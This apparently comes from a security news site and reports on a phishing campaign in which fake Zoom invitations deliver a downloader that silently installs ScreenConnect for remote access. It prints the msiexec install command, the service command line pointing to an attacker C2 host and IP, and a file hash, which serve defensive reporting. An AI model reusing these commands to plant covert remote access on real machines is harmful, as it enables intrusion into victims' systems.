As remote work continues to proliferate in the post-pandemic world, collaboration tools like Zoom, Microsoft Teams, and WebEx have become integral to daily business operations.
However, this widespread adoption has also attracted cybercriminals, who are exploiting trust in these platforms through sophisticated phishing campaigns.
One alarming example involves fake Zoom meeting invitations that deliver malware capable of granting attackers complete remote access to the victim’s computer.
Step 1: The Lure—Fake Zoom Invitation
The attack starts with a convincing email that mimics a legitimate Zoom meeting invitation. The message typically includes a “Join” button, enticing recipients to participate in an urgent or important video call often a tactic used to evoke a rapid, unthinking response.
Step 2: The Trap—Malicious Download
Clicking the “Join” button redirects the user to a website that, while seemingly benign, prompts the visitor to download and install the “latest Zoom client.” Instead of the genuine application, the user receives an executable file—Session.ClientSetup.exe.
File Details
Session.ClientSetup.exef5e467939f8367d084154e1fefc87203e26ec711dbfa83217308e4f2be9d58beThis file is a downloader a lightweight program designed specifically to retrieve further malicious payloads.
Step 3: The Payload Remote Access Trojan Deployment
Once executed, the downloader drops and installs a secondary MSI package using the built-in Windows installer service (msiexec.exe). The dropped file is:
shellC:\Users\admin\AppData\Local\Temp\ScreenConnect\25.2.4.9229\84cae30d9bf18843\ScreenConnect.ClientSetup.msi
It is then installed silently with:
shell"C:\Windows\System32\msiexec.exe" /i "C:\Users\admin\AppData\Local\Temp\ScreenConnect\25.2.4.9229\84cae30d9bf18843\ScreenConnect.ClientSetup.msi"
This package installs ScreenConnect (now known as ConnectWise Control), a legitimate remote administration tool frequently abused in cyberattacks for stealthy remote control.
Step 4: Persistence and Command & Control
After installation, the attacker configures the tool for persistence by registering it as a Windows service:
shell"C:\Program Files (x86)\ScreenConnect Client (84cae30d9bf18843)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=tqtw21aa.anondns.net&p=8041&s=6c9715c2-054f-49cc-b888-4084388fc1c5&..."
C2 Server:
tqtw21aa.anondns.net151.242.63.1398041The infected device then connects to the attacker’s Command & Control (C2) server, granting full remote access, file transfer, and system control capabilities.
Best Practices:
In Case of Infection:
Cybercriminals are constantly evolving their attack methods, but awareness and robust security hygiene remain our best defenses. As remote work and digital collaboration persist, so too must our vigilance against the next fake client download with real consequences.
PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…
Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…
Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…
Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…
Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…
Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…